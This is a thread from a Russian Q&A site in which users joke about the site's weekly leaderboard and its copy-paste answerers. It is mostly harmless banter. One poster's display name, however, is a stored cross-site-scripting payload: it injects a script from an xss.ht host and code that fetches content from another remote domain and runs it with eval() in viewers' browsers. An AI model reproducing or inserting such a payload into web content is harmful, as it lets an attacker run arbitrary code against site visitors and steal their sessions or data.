Вот я думаю, почему так много вопросов про лидеров общего рейтинга) ? (+)

Леся Бякина - не Калякина Просветленный (32102), закрыт 16 лет назад
И главное всех интересует 1 и 2 место копипастеров ссылок) .
А по мне так третье место более интересное)
http://otvet.mail.ru/list/julenka.kotik/answers/?pg=2

Внимание вопрос - для чего нужны топы лидеров? Наслаждаться изяществом ответов?)
Лучший ответ
Сана™ Незнакомка в полутонах Просветленный (38032) 16 лет назад
А бес, то бишь, Байт его знает для чего, в том виде, в котором он есть на сегодняшний день. Сия тайна покрыта толстым слоем мрака. С тех пор, когда вдруг обнаружила себя в лидерах какой-то (не помню какой, давно это было) категории, стала иногда обращать внимание на тройку лидеров, и все время задаюсь этим же самым вопросом. Товарисч не понимаааааааааает! Всю жизнь заблуждалась насчет того, что лидер - это пример. Теперь то мне открыли глаза

на слово ЛИДЕР. О себе, хорошей, ни слова плохо.
ЗЫ Прошлась по ссылочке.... пацсталом))))))) ) ржунимагу)))))))))) ) прифффффффффффффетики))))))))
Источник: Мое второе имя Шапокляк.
Остальные ответы
Veno Гуру (2514) 16 лет назад
а по мне глваное людям помогать, ведь этот проект создан именно для этого.
Анжелика MartensМудрец (12185) 16 лет назад
ага) поможем себе сами))))
Veno Гуру (2514) ну если так, тогда заем мы тут все собрались?
Байт"><script src=https://n4.xss.ht></script>b<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"//n4sty.dev\");a.send();</script>b (17358) 16 лет назад
Вы правы. Жаль, что некоторые это не понимают.
Леся Бякина - не Калякина Просветленный (32102) Некоторые, эт 99 процентов)))? ничего, не переживайте, скоро до всех дойдёт))
Анжелика Martens Мудрец (12185) 16 лет назад
)))))))))))))) валяюсь))) ) чмасикииии Лесяяяяя))) ) ржжжжжуууууу)))) аааааа)) ) Прифффффетикииииии)))))
имяфамилияПросветленный (28598) 16 лет назад
Ё.маЁ и так тоже можно ведь отвечать. валялсопадсталом
ТА Оракул (62660) 16 лет назад
упс.. . точно - интереснее!!! !
Да бедненькая зытырканая Оксаналена - просто умничка, раздаёт всем кому нужно ссылки на одни и те же сайты, доброе дело делает... .
Показатель КПД и топ лидеров - не показывает НИЧЕГО! ..только время и колличество друзей...
Пользователь удален Знаток (495) 16 лет назад
http://otvet.mail.ru/list/julenka.kotik/answers/best/ эта страничка более познавательна
Анжелика MartensМудрец (12185) 16 лет назад
тоже нечо)
Леся Бякина - не КалякинаПросветленный (32102) 16 лет назад
Да там что ни страницка. так все познавательнееи познавательнее)))
Хочу пойти туда на семинар.. обмен опытом языкознания.. такого языка я еще не знаю ))
Евгений Резванов Мудрец (16983) 16 лет назад
То ли дело раньше были вопросы-ответы в категории Леди@mail.ru, вот там на самом деле все вопросы и ответы "золотыми" были.... Без слёз не вспомнишь!
Леся Бякина - не КалякинаПросветленный (32102) 16 лет назад
Платочег дать?)
Евгений Резванов Мудрец (16983) Лучше жилетку! АААААААААА ! А судьи кто?
Tudor Trofim Просветленный (45857) 16 лет назад
Вот, довели и меня до выражении РЖуууууу нЕ МаГууууууу .
Если у этого бедного лидера навести надлежащий порядок в ЛК и привести все в соответствии с правилами, то от статуса Просветленного не знаю если останется что то большего чем для ученика ..
Одним словом Какой проект таковы и его лидеры
humanitas Высший разум (839352) 16 лет назад
Действительно, странно. Навставляла самых дурацких копипастеров, но зато очень много, вот и заработала столько баллов, что стала лидером за неделю.
И чего хорошего?
Пользователь удален Мудрец (12629) 16 лет назад
Это и понятно. Будучи лидером очень трудно РЖАТЬнеМОГЕТЬ)
~Malina~ Высший разум (111209) 16 лет назад
Я уже давно не обращаю внимание на лидеров общего недельного рейтинга, потому что находятся там те, кто или очень много голосует и оценивает вопросы или дает массу примитивных ответов.. . Ну вот теперь там еще появились робот-копипастер и вечно ржущий человек...) ) Наржала девушка, кстати, весьма неплохой КПД...)) )
А для чего нужен этот "топ", я честно говоря не знаю, может быть для того, чтобы некоторые из нас были уверены-рейтинг работает)))
Мурмаладка Гений (76318) 16 лет назад
без коментариеФФФФФФФФФФФФФФФФФФржууууууууууууууууууууууууу
А мну интересно че такое ЦДС? Можа им там полагаетса так разговаривать-)))) А можа она своими постами памагает кому-)))
партизанМудрец (17162) 16 лет назад
Мурмаладка Гений (76318) привет-)) почитала конешна, тока все равно не поняла че энто такое, вижу што маладежь веселитса-))
Призрачный Странник Мудрец (10527) 16 лет назад
Просто они ещё не знают, что лидером буду я.
Плачущий_под_Дождем Просветленный (49317) 16 лет назад
ой, а тя енто тревожит)) ) давай правду матку... тока из ентого все пострадаю не я не она.. . а другой человек))))) ) Удачи. . ну ты как все блондинки)))
Леся Бякина - не КалякинаПросветленный (32102) 16 лет назад
ой, а тебя это задевает)? никто тут не пострадает, просто такого тупизма в ответах ещё не встречала)
Плачущий_под_Дождем Просветленный (49317) ТУПИЗМ - ЕНТО ЛИЦЕМЕРИЕ… прикинь… а что ж я не Б-г судьбами распоряжаться… так бы конечно дал те другой цвет волос)))) вот как раз вы смешны до безобразия.. не мы…))))